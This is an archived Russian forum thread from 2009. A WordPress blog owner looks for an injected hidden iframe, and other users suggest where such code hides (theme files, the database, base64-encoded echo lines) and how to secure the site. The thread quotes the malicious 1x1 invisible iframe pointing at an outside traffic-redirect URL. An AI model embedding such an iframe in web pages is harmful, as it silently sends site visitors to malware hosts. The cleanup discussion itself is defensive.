PDA

Просмотр полной версии : ***ный фрейм в моём блоге!


oOoOoOo
01.03.2009, 17:50
Тяпнули фрейм ко мне в блог, не могу найти. В исходном тексте его видно:
<html><body><iframe src="http://bestlotron.cn/in.cgi?cocacola54" width=1 height=1 style="visibility: hidden"></iframe></body></html>

А в файлах не могу найти, в индексе нету, в индексе который в папке wp-content был, я его удалил, а он почему то не пропал. Куда их ещё могли распихать??

mad_xakep
01.03.2009, 17:51
егов админке щи в стилях

oOoOoOo
01.03.2009, 17:57
егов админке щи в стилях

А поконкретней?

ntldr
01.03.2009, 17:58
дай угадаю. 000webhost?

oOoOoOo
01.03.2009, 18:01
дай угадаю. 000webhost?

Нет, best-hoster.ru , был на другом хосте , тоже фреймы ставили один раз, походу в wp что то

PaCo
01.03.2009, 18:05
Посмотри сдеся -
\wp-content\themes\текушая_тема\
а вобще можно записать во многие файлы, где именно вылазитет ифрейм, в начале или в конце страницы?

mad_xakep
01.03.2009, 18:07
Редактор тем нажми там смотри
footer sidebar и т д

[Dezzter]
01.03.2009, 18:08
ищи в файлах темы, 100% там, а вообще следующий раз юзай плагин http://mywordpress.ru/plugins/belavir/

oOoOoOo
01.03.2009, 18:10
Фрейм в самом конце вылазит

dinar_007
01.03.2009, 18:12
Хеадер.пхп в папке с темой глянь..

PaCo
01.03.2009, 18:15
если в конце после контента то посмотри в footer.php и index.php в папке с темой

oOoOoOo
01.03.2009, 18:20
удалил ещё один из индекса темы.....блять сколько их ещё...

PaCo
01.03.2009, 18:21
Ставь сразу права на файлы - что бы апачь только чтения

dinar_007
01.03.2009, 18:22
Попробуй автоматическим поиском текста в файлах найти фреймы...

mailbrush
01.03.2009, 18:41
Попробуй автоматическим поиском текста в файлах найти фреймы...Они могут быть заенкодены в базе64 и гз...

PaCo
01.03.2009, 18:46
Ну тс же написал что они в плаен тексте, хотя может какая то часть из них может быть с обфускацией, может также быть и в js засунули, ТС поменяй все пассы на ftp, доступы в админку, также если ты помнишь дату когда заливал на сайт файлы зделай поиск по дате изменения, хотя она легко обходиться touch.

oOoOoOo
01.03.2009, 18:52
А как в тотал командере сделать поиск текста в нескольких файлах и папках?

PaCo
01.03.2009, 18:53
А как в тотал командере сделать поиск текста в нескольких файлах и папках?
alt+f7

mailbrush
01.03.2009, 18:56
Ну тс же написал что они в плаен текстеОни в плеин тексте при выводе, а в сорсах могут быть типа echo base64_decode("PGZyYW1lPmxpbms8L2ZyYW1lPg==");

Talisman
01.03.2009, 18:56
втыкай маяки в файлы:

баш скриптом в каждый файл папки втыкай нечто:

<-- file name -->

потом уберешь это. это разобьет вывод на части и будет проще найти.

но встречал и извращенцев, которые срали переменные в одном файле, которые штатно выводил другой файл :) нашел этим способом

PaCo
01.03.2009, 19:04
Может когда ты удаляешь ифрейм делаеться какая ето проверка, и если ифрейма нету то он добавляеться, для фтп есть спец скрипт для этих целей, также втречал ифрейм через include удаленого файла.

..::TROYAN::..
01.03.2009, 19:11
в бд проверь,там могут быть айфреймы...